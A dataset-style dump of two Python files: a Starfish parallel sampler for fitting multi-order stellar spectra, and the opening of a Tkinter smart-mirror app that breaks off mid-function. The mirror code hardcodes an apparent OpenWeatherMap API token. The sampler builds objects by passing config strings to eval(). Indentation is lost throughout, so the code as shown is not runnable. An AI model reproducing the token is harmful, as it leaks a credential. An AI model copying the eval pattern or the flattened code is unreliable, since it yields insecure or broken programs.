source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
parallel.py
|
# Parallel implementation for sampling a multi-order echelle spectrum.
# Because the likelihood calculation is independent for each order, the
# runtime is essentially constant regardless of how large a spectral range is used.
# Additionally, one could use this to fit multiple stars at once.
# parallel.py is meant to be run by other modules that import it and use the objects.
# It has an argparser because I think it's the easiest way to consolidate all of the
# parameters into one place, but I'm open to new suggestions.
import argparse
parser = argparse.ArgumentParser(prog="parallel.py", description="Run Starfish fitting model in parallel.")
parser.add_argument("-r", "--run_index", help="All data will be written into this directory, overwriting any that exists. Default is current working directory.")
# Even though these arguments aren't being used, we need to add them.
parser.add_argument("--generate", action="store_true", help="Write out the data, mean model, and residuals for each order.")
parser.add_argument("--initPhi", action="store_true", help="Create *phi.json files for each order using values in config.yaml")
parser.add_argument("--optimize", choices=["Theta", "Phi", "Cheb"], help="Optimize the Theta or Phi parameters, keeping the alternate set of parameters fixed.")
parser.add_argument("--sample", choices=["ThetaCheb", "ThetaPhi", "ThetaPhiLines"], help="Sample the parameters, keeping the alternate set of parameters fixed.")
parser.add_argument("--samples", type=int, default=5, help="How many samples to run?")
parser.add_argument("--incremental_save", type=int, default=0, help="How often to save incremental progress of MCMC samples.")
parser.add_argument("--use_cov", action="store_true", help="Use the local optimal jump matrix if present.")
args = parser.parse_args()
from multiprocessing import Process, Pipe
import os
import numpy as np
import Starfish
import Starfish.grid_tools
from Starfish.samplers import StateSampler
from Starfish.spectrum import DataSpectrum, Mask, ChebyshevSpectrum
from Starfish.emulator import Emulator
import Starfish.constants as C
from Starfish.covariance import get_dense_C, make_k_func, make_k_func_region
from Starfish.model import ThetaParam, PhiParam
from scipy.special import j1
from scipy.interpolate import InterpolatedUnivariateSpline
from scipy.linalg import cho_factor, cho_solve
from numpy.linalg import slogdet
from astropy.stats import sigma_clip
import gc
import logging
from itertools import chain
from collections import deque
from operator import itemgetter
import yaml
import shutil
import json
def init_directories(run_index=None):
'''
If we are sampling, then we need to setup output directories to store the
samples and other output products. If we're sampling, we probably want to be
running multiple chains at once, and so we have to set things up so that they
don't conflict.
:returns: routdir, the outdir for this current run.
'''
base = Starfish.outdir + Starfish.name + "/run{:0>2}/"
if run_index == None:
run_index = 0
while os.path.exists(base.format(run_index)):
print(base.format(run_index), "exists")
run_index += 1
routdir = base.format(run_index)
else:
routdir = base.format(run_index)
#Delete this routdir, if it exists
if os.path.exists(routdir):
print("Deleting", routdir)
shutil.rmtree(routdir)
print("Creating ", routdir)
os.makedirs(routdir)
# Copy yaml file to routdir for archiving purposes
shutil.copy("config.yaml", routdir + "config.yaml")
# Create subdirectories
for model_number in range(len(Starfish.data["files"])):
for order in Starfish.data["orders"]:
order_dir = routdir + Starfish.specfmt.format(model_number, order)
print("Creating ", order_dir)
os.makedirs(order_dir)
return routdir
if args.run_index:
Starfish.routdir = init_directories(args.run_index)
else:
Starfish.routdir = ""
# list of keys from 0 to (norders - 1)
order_keys = np.arange(len(Starfish.data["orders"]))
DataSpectra = [DataSpectrum.open(os.path.expandvars(file), orders=Starfish.data["orders"]) for file in Starfish.data["files"]]
# list of keys from 0 to (nspectra - 1) Used for indexing purposes.
spectra_keys = np.arange(len(DataSpectra))
#Instruments are provided as one per dataset
Instruments = [eval("Starfish.grid_tools." + inst)() for inst in Starfish.data["instruments"]]
masks = Starfish.config.get("mask", None)
if masks is not None:
for mask, dataSpec in zip(masks, DataSpectra):
myMask = Mask(mask, orders=Starfish.data["orders"])
dataSpec.add_mask(myMask.masks)
# Set up the logger
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", filename="{}log.log".format(
Starfish.routdir), level=logging.DEBUG, filemode="w", datefmt='%m/%d/%Y %I:%M:%S %p')
#
# def perturb(startingDict, jumpDict, factor=3.):
# '''
# Given a starting parameter dictionary loaded from a config file, perturb the
# values as a multiple of the jump distribution. This is designed so that
# not all chains start at exactly the same place.
#
# Modifies the startingDict
# '''
# for key in startingDict.keys():
# startingDict[key] += factor * np.random.normal(loc=0, scale=jumpDict[key])
#
# fix_logg = config.get("fix_logg", None)
# Updating specific covariances to speed mixing
if Starfish.config.get("use_cov", None):
# Use an emprically determined covariance matrix to for the jumps.
pass
def info(title):
'''
Print process information useful for debugging.
'''
print(title)
print('module name:', __name__)
if hasattr(os, 'getppid'): # only available on Unix
print('parent process:', os.getppid())
print('process id:', os.getpid())
class Order:
def __init__(self, debug=False):
'''
This object contains all of the variables necessary for the partial
lnprob calculation for one echelle order. It is designed to first be
instantiated within the main processes and then forked to other
subprocesses. Once operating in the subprocess, the variables specific
to the order are loaded with an `INIT` message call, which tells which key
to initialize on in the `self.initialize()`.
'''
self.lnprob = -np.inf
self.lnprob_last = -np.inf
self.func_dict = {"INIT": self.initialize,
"DECIDE": self.decide_Theta,
"INST": self.instantiate,
"LNPROB": self.lnprob_Theta,
"GET_LNPROB": self.get_lnprob,
"FINISH": self.finish,
"SAVE": self.save,
"OPTIMIZE_CHEB": self.optimize_Cheb
}
self.debug = debug
self.logger = logging.getLogger("{}".format(self.__class__.__name__))
def initialize(self, key):
'''
Initialize to the correct chunk of data (echelle order).
:param key: (spectrum_id, order_key)
:param type: (int, int)
This method should only be called after all subprocess have been forked.
'''
self.id = key
spectrum_id, self.order_key = self.id
# Make sure these are ints
self.spectrum_id = int(spectrum_id)
self.instrument = Instruments[self.spectrum_id]
self.dataSpectrum = DataSpectra[self.spectrum_id]
self.wl = self.dataSpectrum.wls[self.order_key]
self.fl = self.dataSpectrum.fls[self.order_key]
self.sigma = self.dataSpectrum.sigmas[self.order_key]
self.ndata = len(self.wl)
self.mask = self.dataSpectrum.masks[self.order_key]
self.order = int(self.dataSpectrum.orders[self.order_key])
self.logger = logging.getLogger("{} {}".format(self.__class__.__name__, self.order))
if self.debug:
self.logger.setLevel(logging.DEBUG)
else:
self.logger.setLevel(logging.INFO)
self.logger.info("Initializing model on Spectrum {}, order {}.".format(self.spectrum_id, self.order_key))
self.npoly = Starfish.config["cheb_degree"]
self.chebyshevSpectrum = ChebyshevSpectrum(self.dataSpectrum, self.order_key, npoly=self.npoly)
# If the file exists, optionally initiliaze to the chebyshev values
fname = Starfish.specfmt.format(self.spectrum_id, self.order) + "phi.json"
if os.path.exists(fname):
self.logger.debug("Loading stored Chebyshev parameters.")
phi = PhiParam.load(fname)
self.chebyshevSpectrum.update(phi.cheb)
self.resid_deque = deque(maxlen=500) #Deque that stores the last residual spectra, for averaging
self.counter = 0
self.emulator = Emulator.open()
self.emulator.determine_chunk_log(self.wl)
self.pca = self.emulator.pca
self.wl_FFT = self.pca.wl
# The raw eigenspectra and mean flux components
self.EIGENSPECTRA = np.vstack((self.pca.flux_mean[np.newaxis,:], self.pca.flux_std[np.newaxis,:], self.pca.eigenspectra))
self.ss = np.fft.rfftfreq(self.pca.npix, d=self.emulator.dv)
self.ss[0] = 0.01 # junk so we don't get a divide by zero error
# Holders to store the convolved and resampled eigenspectra
self.eigenspectra = np.empty((self.pca.m, self.ndata))
self.flux_mean = np.empty((self.ndata,))
self.flux_std = np.empty((self.ndata,))
self.sigma_mat = self.sigma**2 * np.eye(self.ndata)
self.mus, self.C_GP, self.data_mat = None, None, None
self.lnprior = 0.0 # Modified and set by NuisanceSampler.lnprob
# self.nregions = 0
# self.exceptions = []
# Update the outdir based upon id
self.noutdir = Starfish.routdir + "{}/{}/".format(self.spectrum_id, self.order)
def instantiate(self, *args):
'''
If mixing Theta and Phi optimization/sampling, perform the sigma clipping
operation to instantiate covariant regions to cover outliers.
May involve creating a new NuisanceSampler.
'''
raise NotImplementedError
def get_lnprob(self, *args):
'''
Return the *current* value of lnprob.
Intended to be called from the master process to
query the child processes for their current value of lnprob.
'''
return self.lnprob
def lnprob_Theta(self, p):
'''
Update the model to the Theta parameters and then evaluate the lnprob.
Intended to be called from the master process via the command "LNPROB".
'''
try:
self.update_Theta(p)
lnp = self.evaluate() # Also sets self.lnprob to new value
return lnp
except C.ModelError:
self.logger.debug("ModelError in stellar parameters, sending back -np.inf {}".format(p))
return -np.inf
def evaluate(self):
'''
Return the lnprob using the current version of the C_GP matrix, data matrix,
and other intermediate products.
'''
self.lnprob_last = self.lnprob
X = (self.chebyshevSpectrum.k * self.flux_std * np.eye(self.ndata)).dot(self.eigenspectra.T)
CC = X.dot(self.C_GP.dot(X.T)) + self.data_mat
try:
factor, flag = cho_factor(CC)
except np.linalg.linalg.LinAlgError:
print("Spectrum:", self.spectrum_id, "Order:", self.order)
self.CC_debugger(CC)
raise
try:
R = self.fl - self.chebyshevSpectrum.k * self.flux_mean - X.dot(self.mus)
logdet = np.sum(2 * np.log((np.diag(factor))))
self.lnprob = -0.5 * (np.dot(R, cho_solve((factor, flag), R)) + logdet)
self.logger.debug("Evaluating lnprob={}".format(self.lnprob))
return self.lnprob
# To give us some debugging information about what went wrong.
except np.linalg.linalg.LinAlgError:
print("Spectrum:", self.spectrum_id, "Order:", self.order)
raise
def CC_debugger(self, CC):
'''
Special debugging information for the covariance matrix decomposition.
'''
print('{:-^60}'.format('CC_debugger'))
print("See https://github.com/iancze/Starfish/issues/26")
print("Covariance matrix at a glance:")
if (CC.diagonal().min() < 0.0):
print("- Negative entries on the diagonal:")
print("\t- Check sigAmp: should be positive")
print("\t- Check uncertainty estimates: should all be positive")
elif np.any(np.isnan(CC.diagonal())):
print("- Covariance matrix has a NaN value on the diagonal")
else:
if not np.allclose(CC, CC.T):
print("- The covariance matrix is highly asymmetric")
#Still might have an asymmetric matrix below `allclose` threshold
evals_CC, evecs_CC = np.linalg.eigh(CC)
n_neg = (evals_CC < 0).sum()
n_tot = len(evals_CC)
print("- There are {} negative eigenvalues out of {}.".format(n_neg, n_tot))
mark = lambda val: '>' if val < 0 else '.'
print("Covariance matrix eigenvalues:")
print(*["{: >6} {:{fill}>20.3e}".format(i, evals_CC[i],
fill=mark(evals_CC[i])) for i in range(10)], sep='\n')
print('{: >15}'.format('...'))
print(*["{: >6} {:{fill}>20.3e}".format(n_tot-10+i, evals_CC[-10+i],
fill=mark(evals_CC[-10+i])) for i in range(10)], sep='\n')
print('{:-^60}'.format('-'))
def update_Theta(self, p):
'''
Update the model to the current Theta parameters.
:param p: parameters to update model to
:type p: model.ThetaParam
'''
# durty HACK to get fixed logg
# Simply fixes the middle value to be 4.29
# Check to see if it exists, as well
fix_logg = Starfish.config.get("fix_logg", None)
if fix_logg is not None:
p.grid[1] = fix_logg
print("grid pars are", p.grid)
self.logger.debug("Updating Theta parameters to {}".format(p))
# Store the current accepted values before overwriting with new proposed values.
self.flux_mean_last = self.flux_mean.copy()
self.flux_std_last = self.flux_std.copy()
self.eigenspectra_last = self.eigenspectra.copy()
self.mus_last = self.mus
self.C_GP_last = self.C_GP
# Local, shifted copy of wavelengths
wl_FFT = self.wl_FFT * np.sqrt((C.c_kms + p.vz) / (C.c_kms - p.vz))
# If vsini is less than 0.2 km/s, we might run into issues with
# the grid spacing. Therefore skip the convolution step if we have
# values smaller than this.
# FFT and convolve operations
if p.vsini < 0.0:
raise C.ModelError("vsini must be positive")
elif p.vsini < 0.2:
# Skip the vsini taper due to instrumental effects
eigenspectra_full = self.EIGENSPECTRA.copy()
else:
FF = np.fft.rfft(self.EIGENSPECTRA, axis=1)
# Determine the stellar broadening kernel
ub = 2. * np.pi * p.vsini * self.ss
sb = j1(ub) / ub - 3 * np.cos(ub) / (2 * ub ** 2) + 3. * np.sin(ub) / (2 * ub ** 3)
# set zeroth frequency to 1 separately (DC term)
sb[0] = 1.
# institute vsini taper
FF_tap = FF * sb
# do ifft
eigenspectra_full = np.fft.irfft(FF_tap, self.pca.npix, axis=1)
# Spectrum resample operations
if min(self.wl) < min(wl_FFT) or max(self.wl) > max(wl_FFT):
raise RuntimeError("Data wl grid ({:.2f},{:.2f}) must fit within the range of wl_FFT ({:.2f},{:.2f})".format(min(self.wl), max(self.wl), min(wl_FFT), max(wl_FFT)))
# Take the output from the FFT operation (eigenspectra_full), and stuff them
# into respective data products
for lres, hres in zip(chain([self.flux_mean, self.flux_std], self.eigenspectra), eigenspectra_full):
interp = InterpolatedUnivariateSpline(wl_FFT, hres, k=5)
lres[:] = interp(self.wl)
del interp
# Helps keep memory usage low, seems like the numpy routine is slow
# to clear allocated memory for each iteration.
gc.collect()
# Adjust flux_mean and flux_std by Omega
Omega = 10**p.logOmega
self.flux_mean *= Omega
self.flux_std *= Omega
# Now update the parameters from the emulator
# If pars are outside the grid, Emulator will raise C.ModelError
self.emulator.params = p.grid
self.mus, self.C_GP = self.emulator.matrix
def revert_Theta(self):
'''
Revert the status of the model from a rejected Theta proposal.
'''
self.logger.debug("Reverting Theta parameters")
self.lnprob = self.lnprob_last
self.flux_mean = self.flux_mean_last
self.flux_std = self.flux_std_last
self.eigenspectra = self.eigenspectra_last
self.mus = self.mus_last
self.C_GP = self.C_GP_last
def decide_Theta(self, yes):
'''
Interpret the decision from the master process to either revert the
Theta model (rejected parameters) or move on (accepted parameters).
:param yes: if True, accept stellar parameters.
:type yes: boolean
'''
if yes:
# accept and move on
self.logger.debug("Deciding to accept Theta parameters")
else:
# revert and move on
self.logger.debug("Deciding to revert Theta parameters")
self.revert_Theta()
# Proceed with independent sampling
self.independent_sample(1)
def optimize_Cheb(self, *args):
'''
Keeping the current Theta parameters fixed and assuming white noise,
optimize the Chebyshev parameters
'''
if self.chebyshevSpectrum.fix_c0:
p0 = np.zeros((self.npoly - 1))
self.fix_c0 = True
else:
p0 = np.zeros((self.npoly))
self.fix_c0 = False
def fprob(p):
self.chebyshevSpectrum.update(p)
lnp = self.evaluate()
print(self.order, p, lnp)
if lnp == -np.inf:
return 1e99
else:
return -lnp
from scipy.optimize import fmin
result = fmin(fprob, p0, maxiter=10000, maxfun=10000)
print(self.order, result)
# Due to a JSON bug, np.int64 type objects will get read twice,
# and cause this routine to fail. Therefore we have to be careful
# to convert these to ints.
phi = PhiParam(spectrum_id=int(self.spectrum_id), order=int(self.order), fix_c0=self.chebyshevSpectrum.fix_c0, cheb=result)
phi.save()
def update_Phi(self, p):
'''
Update the Phi parameters and data covariance matrix.
:param params: large dictionary containing cheb, cov, and regions
'''
raise NotImplementedError
def revert_Phi(self, *args):
'''
Revert all products from the nuisance parameters, including the data
covariance matrix.
'''
self.logger.debug("Reverting Phi parameters")
self.lnprob = self.lnprob_last
self.chebyshevSpectrum.revert()
self.data_mat = self.data_mat_last
def clear_resid_deque(self):
'''
Clear the accumulated residual spectra.
'''
self.resid_deque.clear()
def independent_sample(self, niter):
'''
Do the independent sampling specific to this echelle order, using the
attached self.sampler (NuisanceSampler).
:param niter: number of iterations to complete before returning to master process.
'''
self.logger.debug("Beginning independent sampling on Phi parameters")
if self.lnprob:
# If we have a current value, pass it to the sampler
self.p0, self.lnprob, state = self.sampler.run_mcmc(pos0=self.p0, N=niter, lnprob0=self.lnprob)
else:
# Otherwise, start from the beginning
self.p0, self.lnprob, state = self.sampler.run_mcmc(pos0=self.p0, N=niter)
self.logger.debug("Finished independent sampling on Phi parameters")
# Don't return anything to the master process.
def finish(self, *args):
'''
Wrap up the sampling and write the samples to disk.
'''
self.logger.debug("Finishing")
def brain(self, conn):
'''
The infinite loop of the subprocess, which continues to listen for
messages on the pipe.
'''
self.conn = conn
alive = True
while alive:
#Keep listening for messages put on the Pipe
alive = self.interpret()
#Once self.interpret() returns `False`, this loop will die.
self.conn.send("DEAD")
def interpret(self):
'''
Interpret the messages being put into the Pipe, and do something with
them. Messages are always sent in a 2-arg tuple (fname, arg)
Right now we only expect one function and one argument but this could
be generalized to **args.
'''
#info("brain")
fname, arg = self.conn.recv() # Waits here to receive a new message
self.logger.debug("{} received message {}".format(os.getpid(), (fname, arg)))
func = self.func_dict.get(fname, False)
if func:
response = func(arg)
else:
self.logger.info("Given an unknown function {}, assuming kill signal.".format(fname))
return False
# Functions only return a response other than None when they want them
# communicated back to the master process.
# Some commands sent to the child processes do not require a response
# to the main process.
if response:
self.logger.debug("{} sending back {}".format(os.getpid(), response))
self.conn.send(response)
return True
def save(self, *args):
'''
Using the current values for flux, write out the data, mean model, and mean
residuals into a JSON.
'''
X = (self.chebyshevSpectrum.k * self.flux_std * np.eye(self.ndata)).dot(self.eigenspectra.T)
model = self.chebyshevSpectrum.k * self.flux_mean + X.dot(self.mus)
resid = self.fl - model
my_dict = {"wl":self.wl.tolist(), "data":self.fl.tolist(), "model":model.tolist(), "resid":resid.tolist(), "sigma":self.sigma.tolist(), "spectrum_id":self.spectrum_id, "order":self.order}
fname = Starfish.specfmt.format(self.spectrum_id, self.order)
f = open(fname + "spec.json", 'w')
json.dump(my_dict, f, indent=2, sort_keys=True)
f.close()
class OptimizeTheta(Order):
def initialize(self, key):
super().initialize(key)
# Any additional setup here
# for now, just use white noise
self.data_mat = self.sigma_mat.copy()
class OptimizeCheb(Order):
def initialize(self, key):
super().initialize(key)
# Any additional setup here
# for now, just use white noise
self.data_mat = self.sigma_mat.copy()
class OptimizePhi(Order):
def __init__(self):
pass
class SampleThetaCheb(Order):
def initialize(self, key):
super().initialize(key)
# for now, just use white noise
self.data_mat = self.sigma_mat.copy()
self.data_mat_last = self.data_mat.copy()
#Set up p0 and the independent sampler
fname = Starfish.specfmt.format(self.spectrum_id, self.order) + "phi.json"
phi = PhiParam.load(fname)
self.p0 = phi.cheb
cov = np.diag(Starfish.config["cheb_jump"]**2 * np.ones(len(self.p0)))
def lnfunc(p):
# turn this into pars
self.update_Phi(p)
lnp = self.evaluate()
self.logger.debug("Evaluated Phi parameters: {} {}".format(p, lnp))
return lnp
def rejectfn():
self.logger.debug("Calling Phi revertfn.")
self.revert_Phi()
self.sampler = StateSampler(lnfunc, self.p0, cov, query_lnprob=self.get_lnprob, rejectfn=rejectfn, debug=True)
def update_Phi(self, p):
'''
Update the Chebyshev coefficients only.
'''
self.chebyshevSpectrum.update(p)
def finish(self, *args):
super().finish(*args)
fname = Starfish.routdir + Starfish.specfmt.format(self.spectrum_id, self.order) + "/mc.hdf5"
self.sampler.write(fname=fname)
class SampleThetaPhi(Order):
def initialize(self, key):
# Run through the standard initialization
super().initialize(key)
# for now, start with white noise
self.data_mat = self.sigma_mat.copy()
self.data_mat_last = self.data_mat.copy()
#Set up p0 and the independent sampler
fname = Starfish.specfmt.format(self.spectrum_id, self.order) + "phi.json"
phi = PhiParam.load(fname)
# Set the regions to None, since we don't want to include them even if they
# are there
phi.regions = None
#Loading file that was previously output
# Convert PhiParam object to an array
self.p0 = phi.toarray()
jump = Starfish.config["Phi_jump"]
cheb_len = (self.npoly - 1) if self.chebyshevSpectrum.fix_c0 else self.npoly
cov_arr = np.concatenate((Starfish.config["cheb_jump"]**2 * np.ones((cheb_len,)), np.array([jump["sigAmp"], jump["logAmp"], jump["l"]])**2 ))
cov = np.diag(cov_arr)
def lnfunc(p):
# Convert p array into a PhiParam object
ind = self.npoly
if self.chebyshevSpectrum.fix_c0:
ind -= 1
cheb = p[0:ind]
sigAmp = p[ind]
ind+=1
logAmp = p[ind]
ind+=1
l = p[ind]
par = PhiParam(self.spectrum_id, self.order, self.chebyshevSpectrum.fix_c0, cheb, sigAmp, logAmp, l)
self.update_Phi(par)
# sigAmp must be positive (this is effectively a prior)
# See https://github.com/iancze/Starfish/issues/26
if not (0.0 < sigAmp):
self.lnprob_last = self.lnprob
lnp = -np.inf
self.logger.debug("sigAmp was negative, returning -np.inf")
self.lnprob = lnp # Same behavior as self.evaluate()
else:
lnp = self.evaluate()
self.logger.debug("Evaluated Phi parameters: {} {}".format(par, lnp))
return lnp
def rejectfn():
self.logger.debug("Calling Phi revertfn.")
self.revert_Phi()
self.sampler = StateSampler(lnfunc, self.p0, cov, query_lnprob=self.get_lnprob, rejectfn=rejectfn, debug=True)
def update_Phi(self, p):
self.logger.debug("Updating nuisance parameters to {}".format(p))
# Read off the Chebyshev parameters and update
self.chebyshevSpectrum.update(p.cheb)
# Check to make sure the global covariance parameters make sense
#if p.sigAmp < 0.1:
# raise C.ModelError("sigAmp shouldn't be lower than 0.1, something is wrong.")
max_r = 6.0 * p.l # [km/s]
# Create a partial function which returns the proper element.
k_func = make_k_func(p)
# Store the previous data matrix in case we want to revert later
self.data_mat_last = self.data_mat
self.data_mat = get_dense_C(self.wl, k_func=k_func, max_r=max_r) + p.sigAmp*self.sigma_mat
def finish(self, *args):
super().finish(*args)
fname = Starfish.routdir + Starfish.specfmt.format(self.spectrum_id, self.order) + "/mc.hdf5"
self.sampler.write(fname=fname)
class SampleThetaPhiLines(Order):
def initialize(self, key):
# Run through the standard initialization
super().initialize(key)
# for now, start with white noise
self.data_mat = self.sigma_mat.copy()
self.data_mat_last = self.data_mat.copy()
#Set up p0 and the independent sampler
fname = Starfish.specfmt.format(self.spectrum_id, self.order) + "phi.json"
phi = PhiParam.load(fname)
# print("Phi.regions", phi.regions)
# import sys
# sys.exit()
# Get the regions matrix
region_func = make_k_func_region(phi)
max_r = 4.0 * np.max(phi.regions, axis=0)[2]
self.region_mat = get_dense_C(self.wl, k_func=region_func, max_r=max_r)
print(self.region_mat)
# Then set phi to None
phi.regions = None
#Loading file that was previously output
# Convert PhiParam object to an array
self.p0 = phi.toarray()
jump = Starfish.config["Phi_jump"]
cheb_len = (self.npoly - 1) if self.chebyshevSpectrum.fix_c0 else self.npoly
cov_arr = np.concatenate((Starfish.config["cheb_jump"]**2 * np.ones((cheb_len,)), np.array([jump["sigAmp"], jump["logAmp"], jump["l"]])**2 ))
cov = np.diag(cov_arr)
def lnfunc(p):
# Convert p array into a PhiParam object
ind = self.npoly
if self.chebyshevSpectrum.fix_c0:
ind -= 1
cheb = p[0:ind]
sigAmp = p[ind]
ind+=1
logAmp = p[ind]
ind+=1
l = p[ind]
phi = PhiParam(self.spectrum_id, self.order, self.chebyshevSpectrum.fix_c0, cheb, sigAmp, logAmp, l)
self.update_Phi(phi)
lnp = self.evaluate()
self.logger.debug("Evaluated Phi parameters: {} {}".format(phi, lnp))
return lnp
def rejectfn():
self.logger.debug("Calling Phi revertfn.")
self.revert_Phi()
self.sampler = StateSampler(lnfunc, self.p0, cov, query_lnprob=self.get_lnprob, rejectfn=rejectfn, debug=True)
def update_Phi(self, phi):
self.logger.debug("Updating nuisance parameters to {}".format(phi))
# Read off the Chebyshev parameters and update
self.chebyshevSpectrum.update(phi.cheb)
# Check to make sure the global covariance parameters make sense
if phi.sigAmp < 0.1:
raise C.ModelError("sigAmp shouldn't be lower than 0.1, something is wrong.")
max_r = 6.0 * phi.l # [km/s]
# Create a partial function which returns the proper element.
k_func = make_k_func(phi)
# Store the previous data matrix in case we want to revert later
self.data_mat_last = self.data_mat
self.data_mat = get_dense_C(self.wl, k_func=k_func, max_r=max_r) + phi.sigAmp*self.sigma_mat + self.region_mat
def finish(self, *args):
super().finish(*args)
fname = Starfish.routdir + Starfish.specfmt.format(self.spectrum_id, self.order) + "/mc.hdf5"
self.sampler.write(fname=fname)
# class SampleThetaPhiLines(Order):
# def instantiate(self, *args):
# # threshold for sigma clipping
# sigma=config["sigma_clip"]
#
# # array that specifies if a pixel is already covered.
# # to start, it should be all False
# covered = np.zeros((self.ndata,), dtype='bool')
#
# #average all of the spectra in the deque together
# residual_array = np.array(self.resid_deque)
# if len(self.resid_deque) == 0:
# raise RuntimeError("No residual spectra stored yet.")
# else:
# residuals = np.average(residual_array, axis=0)
#
# # run the sigma_clip algorithm until converged, and we've identified the outliers
# filtered_data = sigma_clip(residuals, sig=sigma, iters=None)
# mask = filtered_data.mask
# wl = self.wl
#
# sigma0 = config['region_priors']['sigma0']
# logAmp = config["region_params"]["logAmp"]
# sigma = config["region_params"]["sigma"]
#
# # Sort in decreasing strength of residual
# self.nregions = 0
# regions = {}
#
# region_mus = {}
# for w, resid in sorted(zip(wl[mask], np.abs(residuals[mask])), key=itemgetter(1), reverse=True):
# if w in wl[covered]:
# continue
# else:
# # check to make sure region is not *right* at the edge of the echelle order
# if w <= np.min(wl) or w >= np.max(wl):
# continue
# else:
# # instantiate region and update coverage
#
# # Default amp and sigma values
# regions[self.nregions] = {"logAmp":logAmp, "sigma":sigma, "mu":w}
# region_mus[self.nregions] = w # for evaluating the mu prior
# self.nregions += 1
#
# # determine the stretch of wl covered by this new region
# ind = (wl >= (w - sigma0)) & (wl <= (w + sigma0))
# # update the covered regions
# covered = covered | ind
#
# # Take the current nuisance positions as a starting point, and add the regions
# starting_dict = self.sampler.params.copy()
# starting_dict["regions"] = regions
#
# region_mus = np.array([region_mus[i] for i in range(self.nregions)])
#
# # Setup the priors
# region_priors = config["region_priors"]
# region_priors.update({"mus":region_mus})
# prior_params = {"regions":region_priors}
#
# # do all this crap again
# cheb_MH_cov = float(config["cheb_jump"])**2 * np.ones((self.npoly,))
# cov_MH_cov = np.array([float(config["cov_jump"][key]) for key in self.sampler.cov_tup])**2
# region_MH_cov = [float(config["region_jump"][key])**2 for key in C.cov_region_parameters]
# regions_MH_cov = np.array([region_MH_cov for i in range(self.nregions)]).flatten()
#
# nuisance_MH_cov = np.diag(np.concatenate((cheb_MH_cov, cov_MH_cov, regions_MH_cov)))
#
# print(starting_dict)
# print("cov shape {}".format(nuisance_MH_cov.shape))
#
# # Initialize a new sampler, replacing the old one
# self.sampler = NuisanceSampler(OrderModel=self, starting_param_dict=starting_dict, cov=nuisance_MH_cov, debug=True, outdir=self.noutdir, prior_params=prior_params, order=self.order)
#
# self.p0 = self.sampler.p0
#
# # Update the nuisance parameters to the starting values so that we at least have a self.data_mat
# print("Updating nuisance parameter data products to starting values.")
# self.update_nuisance(starting_dict)
# self.lnprob = self.evaluate()
#
# # To speed up convergence, try just doing a bunch of nuisance runs before
# # going into the iteration pattern
# print("Doing nuisance burn-in for {} samples".format(config["nuisance_burn"]))
# self.independent_sample(config["nuisance_burn"])
# We create one Order() in the main process. When the process forks, each
# subprocess now has its own independent OrderModel instance.
# Then, each forked model will be customized using an INIT command passed
# through the PIPE.
def initialize(model):
# Fork a subprocess for each key: (spectra, order)
pconns = {} # Parent connections
cconns = {} # Child connections
ps = {} # Process objects
# Create all of the pipes
for spectrum_key in spectra_keys:
for order_key in order_keys:
pconn, cconn = Pipe()
key = (spectrum_key, order_key)
pconns[key], cconns[key] = pconn, cconn
p = Process(target=model.brain, args=(cconn,))
p.start()
ps[key] = p
# initialize each Model to a specific DataSpectrum and echelle order
for key, pconn in pconns.items():
pconn.send(("INIT", key))
return (pconns, cconns, ps)
def profile_code():
'''
Test hook designed to be used by cprofile or kernprof. Does not include any
network latency from communicating or synchronizing between processes
because we run on just one process.
'''
#Evaluate one complete iteration from delivery of stellar parameters from master process
#Master proposal
stellar_Starting.update({"logg":4.29})
model.stellar_lnprob(stellar_Starting)
#Assume we accepted
model.decide_stellar(True)
#Right now, assumes Kurucz order 23
def main():
# Uncomment these lines to profile
# #Initialize the current model for profiling purposes
# model.initialize((0, 0))
# import cProfile
# cProfile.run("profile_code()", "prof")
# import sys; sys.exit()
# Kill all of the orders
for pconn in pconns.values():
pconn.send(("FINISH", None))
pconn.send(("DIE", None))
# Join on everything and terminate
for p in ps.values():
p.join()
p.terminate()
import sys;sys.exit()
if __name__=="__main__":
main()
# All subprocesses will inherit pipe file descriptors created in the master process.
# http://www.pushingbits.net/posts/python-multiprocessing-with-pipes/
# thus, to really close a pipe, you need to close it in every subprocess.
|
TestMirror.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import locale
from threading import Thread
import time
import traceback
import urllib
import feedparser
try:
from Tkinter import *
import Tkinter as tk
except ImportError:
from tkinter import *
import tkinter as tk
import datetime
import pickle
import os
import os.path
import json
import requests
import dateutil.parser
import sys
import pprint
# import Adafruit_DHT #humidity tester package(can't install without raspberry pi)
#from gpiozero import MotionSensor #importing motion sensor to use with the pi
from PIL import Image, ImageTk
time_format = 12 # 12 or 24
date_format = "%b %d, %Y" # check python doc for strftime() for options
news_country_code = 'US'
weather_api_token = '822c250a4e12f332ddae25014a4fc2b2' # create account at https://openweathermap.org/
weather_city_id = '2028461' # List of city ID city.list.json.gz can be downloaded here http://bulk.openweathermap.org/sample/
weather_unit = 'metric' # For temperature in Fahrenheit use "imperial"
# For temperature in Celsius use "metric"
# Temperature in Kelvin is used by default, no need to use units parameter in API call
xlarge_text_size = 94
large_text_size = 48
medium_text_size = 28
small_text_size = 18
xsmall_text_size = 14
text_font = "Roboto"
text_color = "white"
background_color = 'black'
icon_lookup = {
'01d': "assets/01d.png",
'01n': "assets/01n.png",
'02d': "assets/02d.png",
'02n': "assets/02n.png",
'03d': "assets/03d.png",
'03n': "assets/03n.png",
'04d': "assets/04d.png",
'04n': "assets/04n.png",
'09d': "assets/09d.png",
'09n': "assets/09n.png",
'10d': "assets/10d.png",
'10n': "assets/10n.png",
'11d': "assets/11d.png",
'11n': "assets/11n.png",
'13d': "assets/13d.png",
'13n': "assets/13n.png",
'50d': "assets/50d.png",
'50n': "assets/50n.png",
}
# Get Date/Time
class Clock(Frame):
def __init__(self, parent):
Frame.__init__(self, parent, bg=background_color)
# initialize time label
self.time1 = ''
self.timeLbl = Label(self, font=(text_font, large_text_size), fg=text_color, bg=background_color)
self.timeLbl.pack(side=TOP, anchor=W)
# initialize day of week
self.day_of_week1 = ''
self.dayOWLbl = Label(self, text=self.day_of_week1, font=(text_font, small_text_size), fg=text_color,
bg=background_color)
self.dayOWLbl.pack(side=TOP, anchor=W)
# initialize date label
self.date1 = ''
self.dateLbl = Label(self, text=self.date1, font=(text_font, small_text_size), fg=text_color,
bg=background_color)
self.dateLbl.pack(side=TOP, anchor=W)
self.tick()
def tick(self):
if time_format == 12:
time2 = time.strftime('%I:%M %p') # hour in 12h format
else:
time2 = time.strftime('%H:%M') # hour in 24h format
day_of_week2 = time.strftime('%A')
